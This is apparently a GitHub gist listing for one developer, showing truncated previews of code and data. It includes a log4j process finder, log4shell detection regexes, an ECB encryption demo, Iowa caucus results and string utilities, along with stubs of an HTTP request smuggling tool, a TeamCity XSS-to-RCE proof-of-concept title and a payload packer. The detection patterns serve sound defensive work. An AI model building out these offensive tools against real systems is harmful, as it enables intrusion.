Karan Lyons karanlyons

#!/usr/bin/env python3
from collections import namedtuple
from math import ceil, gcd, sqrt
# Calculating distances with bounces and stuff is...a pain, but given our bounce rules we
# can instead construct infinite congruent rooms, mirrored about each other, which in
# effect "unwraps" the bouncing line into just a straight one. In ascii form:
karanlyons / README.md
Last active December 4, 2023 23:07
Find Running Processes Referencing log4j

When run on a box, outputs a single row of JSON for every proc on the box that loads a jar/war that contains any files with 'log4j' in them, including precisely what triggered the match. For example (pretty printed here for clarity; note that this one is happily a false positive):

{
  "node": "HW0000001",
  "time": 1632617610.3860812,
  "pid": 78676,
  "cmd": "/usr/local/opt/openjdk/libexec/openjdk.jdk/Contents/Home/bin/java",
  "args": [
    "-Xms128M",
karanlyons / log4shell_regexes.py
Last active March 7, 2022 03:49
log4shell Regexes
import re
from urllib.parse import unquote
FLAGS = re.IGNORECASE | re.DOTALL
ESC_DOLLAR = r'(?:\$|[\\%]u0024|\\x24|\\0?44|%24)'
ESC_LCURLY = r'(?:\{|[\\%]u007B|\\x7B|\\173|%7B)'
ESC_RCURLY = r'(?:\}|[\\%]u007D|\\x7D|\\175|%7D)'
_U_PERCENT_ESCAPE_RE = re.compile(r'%(u[0-9a-f]{4})', flags=FLAGS)
_PERCENT_ESCAPE_RE = re.compile(r'%[0-9a-f]{2}', flags=FLAGS)
karanlyons / example.md
Last active May 1, 2020 08:15
pngen: Makes ECB PNGuins

Plaintext:

Plaintext Penguin

Duplicate Plaintext Blocks:
	Total Blocks:                         358414
	Total Duplicates:                     349474
karanlyons / IA.json
Created February 6, 2020 03:45
Iowa Caucus 2020 JSON Results
{"Adair":{"4SE ORIENT":{"Bennet":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Biden":{"First Expression":7.0,"Final Expression":7.0,"SDE":0.1569},"Bloomberg":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Buttigieg":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.1569},"Delaney":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Gabbard":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Klobuchar":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.1569},"Patrick":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Sanders":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.0784},"Steyer":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Warren":{"First Expression":9.0,"Final Expression":9.0,"SDE":0.2353},"Yang":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Other":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Uncommitted":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0}},"1NW ADAIR":{"Bennet":{"First Ex
karanlyons / smuggler.py
Last active February 17, 2021 17:58
Burp Suite is for chumps.
#!/usr/bin/env python3
import dataclasses
import re
import socket
import ssl as _ssl
import types
from collections import namedtuple, OrderedDict
from dataclasses import dataclass
from io import StringIO
from itertools import chain
karanlyons / lazyString.ts
Last active August 7, 2019 06:50
Procrastinate till you evaluate.
export type StringReturningFunction = (...args: any[]) => string;
interface LazyString extends String {}
interface LazyStringConstructor {
new <F extends StringReturningFunction>(
func: F,
...args: Parameters<F>
): LazyString;
<F extends StringReturningFunction>(func: F, ...args: Parameters<F>): string;
karanlyons / format.ts
Last active August 6, 2019 12:08
Add translator friendly markup to translatable strings.
export type Formatters = { [k: string]: (s: string) => string };
export class FormatError extends Error {
constructor(
public message: string,
public str: string,
public formatters: Formatters,
public tag: string
) {
super();
karanlyons / teamcity-poc-link.text
Last active December 19, 2019 21:33
TeamCity XSS RCE PoC
karanlyons / payloadPack.js
Last active July 26, 2019 20:52
Char wise, byte foolish.
const pack = s =>
s.match(/^[\u0000-\u00ff]*$/)
? s
.split("")
.map(s => s.charCodeAt())
.reduce(
(pairs, c) =>
(
!c || pairs[pairs.length - 1].length === 2
? pairs.push(...(c? [[c]] : [[c], []]))